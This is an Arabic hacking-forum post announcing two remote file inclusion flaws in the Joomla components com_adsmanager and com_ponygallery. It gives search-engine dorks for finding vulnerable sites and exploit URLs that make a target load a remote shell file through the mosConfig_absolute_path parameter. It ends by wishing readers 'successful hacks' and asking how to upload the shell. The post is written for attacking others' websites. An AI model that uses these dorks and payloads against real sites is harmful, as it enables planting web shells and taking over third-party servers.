:: vBspiders Professional Network :: - ثغرات جديدة في سكربت Joomla

السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadf...adsmanager.zip

و الآن الشيء المهم

الدورك :

كود PHP:

   inurl:"com_adsmanager"

الاستغلال :

كود PHP:

   www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

كود PHP:

   inurl:"com_ponygallery"

الاستغلال

كود PHP:

   www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]

او

كود PHP:

   www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]

حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة